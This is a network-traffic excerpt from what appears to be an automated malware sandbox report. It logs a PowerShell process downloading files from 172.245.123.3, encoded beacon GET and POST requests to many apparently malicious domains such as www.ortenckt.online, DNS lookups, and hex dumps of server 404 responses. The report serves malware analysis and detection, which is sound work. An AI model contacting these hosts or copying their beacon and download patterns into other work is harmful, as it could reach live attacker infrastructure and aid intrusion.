                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_05117A18 URLDownloadToFileW,3_2_05117A18
                  Source: global trafficHTTP traffic detected: GET /784/verygreattrafficwithniceworkingskilltobegood.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.123.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /784/CAMRRAM.txt HTTP/1.1Host: 172.245.123.3Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM= HTTP/1.1Host: www.inastra.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aj1a/?ZrE=Ur0ZWyFT8OiEfJLk5CDxNCd7dngJ/nUOC6gmTkbLwRlGrqwEpeuL3mntSz3wGsXywBh/uITd5DD6tXUqWwiKdOlO+GKC/0z5L+tJCqOb0hSd3y/0vLqXRKaQtaaTWzJkNrBKAAI=&Jr=tnaxxtx HTTP/1.1Host: www.ortenckt.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /dlcs/?ZrE=w6QiAdP8awPLsa7eBVc39wzje3KOivPaseEO6V4cXiHKOPXUCZsKQLVdGPqPnVEzm93wkYEJdOAjyg/exCmJYaQq4xVLxeGT88y8VuPgcLQNhWCgEoW6IBmijKvaz1FJHcFNtNE=&Jr=tnaxxtx HTTP/1.1Host: www.ks1x7i.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /j82t/?ZrE=NfWXDnAQh5K3pnOvM14VTy+amnJPckA/Yfv/BKk9TV5fOF3SI/PjO3S5UMxnHoxUaRbUJGZsTsQcLMza5Yog8fRAodWufvWEXO0cDD2ch1ehULAsaf2d9mbkKApg9S+Ve9CxlSo=&Jr=tnaxxtx HTTP/1.1Host: www.aaavvejibej.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /lrgf/?ZrE=hLl6Iyyv1/RGmZWnRJ8bmiMJmTP6dhK4gm2wi1fTCYCBRK5IakRwGOHrv3dZYUH5yIXieuiAG/czDQPLmWqEbLilSzY96+fF8eVAog2wOE9edOY1dT6GtuOhq9bHDkAhjeaZiB4=&Jr=tnaxxtx HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /vfa8/?ZrE=yTDEjSVS0lCRYcLIcrIR3TcCYEVKOYUzZB0jcnDiZYtjnJOoqq5Z+2u71ELG2uGtiKDGExTS3yLoYSdFQgyUiMInkJIsAAFuKMZReKrfZcHWOCruByZu1/Jk+op4CslnIJH3FWE=&Jr=tnaxxtx HTTP/1.1Host: www.tophcom.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /obbp/?ZrE=q8u4kFvwJtfA9Pl2Tc7XzAnO7IWA4JmOGaMFAF6owipiqs4LNofKQ6whCXFZjhm4RzxlyIFmCbk02gBov1+7TAel+jFtI3CD3Jdw5DP3HME6qP+mS3NVD/GMMnbyFe0QVN3VaJo=&Jr=tnaxxtx HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /566f/?ZrE=81geMJs5jQmVeK4hwDBPKHBGvn0Tm7ZwgeOmc9jTU6Fy38DzzGnJ98DUeY7D2pyu2XwXZT+7XMaW7aMNMrEzQeD/F7FTjsbI9QNHnkd6Arn6dVLur5eWw9nVs6w/1EYvnvYCbSs=&Jr=tnaxxtx HTTP/1.1Host: www.healthyloveforall.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /tkmh/?Jr=tnaxxtx&ZrE=xPv3ed6Vo6P/OeD+soQOKhGtpyHDw/FO+ter//brXKVYevLLhvaYsARGwIBiS273ToVNwXlIv9TeCbPJyvYOrdDnTudDZaU/k/ECAD12ggB+I5+8DAynmnMMiOBcr//QwqdtWEY= HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtx HTTP/1.1Host: www.yu12345.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw= HTTP/1.1Host: www.qmmkl.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                  Source: global trafficDNS traffic detected: DNS query: www.inastra.online
                  Source: global trafficDNS traffic detected: DNS query: www.ortenckt.online
                  Source: global trafficDNS traffic detected: DNS query: www.ks1x7i.vip
                  Source: global trafficDNS traffic detected: DNS query: www.aaavvejibej.bond
                  Source: global trafficDNS traffic detected: DNS query: www.deikamalaharris.info
                  Source: global trafficDNS traffic detected: DNS query: www.tophcom.online
                  Source: global trafficDNS traffic detected: DNS query: www.chalet-tofane.net
                  Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
                  Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
                  Source: global trafficDNS traffic detected: DNS query: www.yu12345.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.qmmkl.buzz
                  Source: unknownHTTP traffic detected: POST /aj1a/ HTTP/1.1Host: www.ortenckt.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.ortenckt.onlineConnection: closeCache-Control: no-cacheContent-Length: 208Content-Type: application/x-www-form-urlencodedReferer: http://www.ortenckt.online/aj1a/User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 5a 72 45 3d 5a 70 63 35 56 46 39 37 30 4a 47 76 53 37 6a 4f 75 44 6e 66 50 31 6c 62 65 58 46 4e 33 52 77 31 4a 71 6f 41 54 31 76 78 76 68 42 46 31 74 45 7a 6f 4a 36 43 38 57 6e 58 55 67 2f 32 49 34 54 78 2f 68 46 39 34 63 4c 70 78 47 75 6c 68 53 4a 36 63 43 2b 61 55 65 4e 71 32 79 4b 6d 79 47 54 4e 4d 36 6f 39 56 2b 57 2b 74 52 4b 6a 31 55 4f 57 6e 65 6d 44 53 71 36 4e 70 4c 33 33 64 41 49 39 62 4e 67 73 49 33 4f 58 36 77 48 70 71 31 4d 79 34 6c 51 72 67 69 6e 63 2b 58 4b 32 61 65 72 6c 64 75 72 2b 4e 33 77 34 39 6e 55 68 32 4f 39 41 44 4c 55 63 51 4a 64 2b 6e 49 31 51 5a 48 43 31 41 68 35 55 59 53 35 31 32 68 54 42 Data Ascii: ZrE=Zpc5VF970JGvS7jOuDnfP1lbeXFN3Rw1JqoAT1vxvhBF1tEzoJ6C8WnXUg/2I4Tx/hF94cLpxGulhSJ6cC+aUeNq2yKmyGTNM6o9V+W+tRKj1UOWnemDSq6NpL33dAI9bNgsI3OX6wHpq1My4lQrginc+XK2aerldur+N3w49nUh2O9ADLUcQJd+nI1QZHC1Ah5UYS512hTB
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 04:39:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI0tjnFbErdmpJUS4HVz9oEnNtVL6kmpe84qPBaC2ALKfYYXqbdRoCOLm368heIrmkoOSuspmpYY4DXYhB6sDk9nGLRYunOi%2BQAeDyNIXLKTcVi7LYJ0GnHxxKPJT11rJOKlOHo64g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed15abbb8778c45-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1800&rtt_var=900&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=552&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 04:40:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 04:40:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 04:40:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 04:40:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 05 Dec 2024 04:40:25 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 